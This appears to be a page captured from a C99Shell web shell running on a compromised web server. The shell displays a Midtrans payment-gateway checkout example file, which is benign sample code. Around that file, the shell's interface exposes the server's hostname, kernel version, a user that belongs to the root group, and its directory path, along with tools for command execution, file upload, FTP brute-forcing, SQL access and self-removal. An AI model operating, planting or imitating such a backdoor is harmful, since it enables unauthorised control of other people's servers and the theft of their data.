!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/midtrans/midtrans-php/examples/snap/   drwxr-xr-x
Free 28.57 GB of 117.98 GB (24.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     checkout-process-simple-version.php (1.68 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Midtrans;

require_once 
dirname(__FILE__) . '/../../Midtrans.php';
//Set Your server key
Config::$serverKey "<your server key>";
// Uncomment for production environment
// Config::$isProduction = true;
Config::$isSanitized Config::$is3ds true;

// Required
$transaction_details = array(
    
'order_id' => rand(),
    
'gross_amount' => 94000// no decimal allowed for creditcard
);
// Optional
$item_details = array (
    array(
        
'id' => 'a1',
        
'price' => 94000,
        
'quantity' => 1,
        
'name' => "Apple"
    
),
  );
// Optional
$customer_details = array(
    
'first_name'    => "Andri",
    
'last_name'     => "Litani",
    
'email'         => "andri@litani.com",
    
'phone'         => "081122334455",
    
'billing_address'  => $billing_address,
    
'shipping_address' => $shipping_address
);
// Fill transaction details
$transaction = array(
    
'transaction_details' => $transaction_details,
    
'customer_details' => $customer_details,
    
'item_details' => $item_details,
);

$snapToken Snap::getSnapToken($transaction);
echo 
"snapToken = ".$snapToken;
?>

<!DOCTYPE html>
<html>
    <body>
        <button id="pay-button">Pay!</button>
        <!-- TODO: Remove ".sandbox" from script src URL for production environment. Also input your client key in "data-client-key" -->
        <script src="https://app.sandbox.midtrans.com/snap/snap.js" data-client-key="<Set your ClientKey here>"></script>
        <script type="text/javascript">
            document.getElementById('pay-button').onclick = function(){
                // SnapToken acquired from previous step
                snap.pay('<?php echo $snapToken?>');
            };
        </script>
    </body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.005 ]--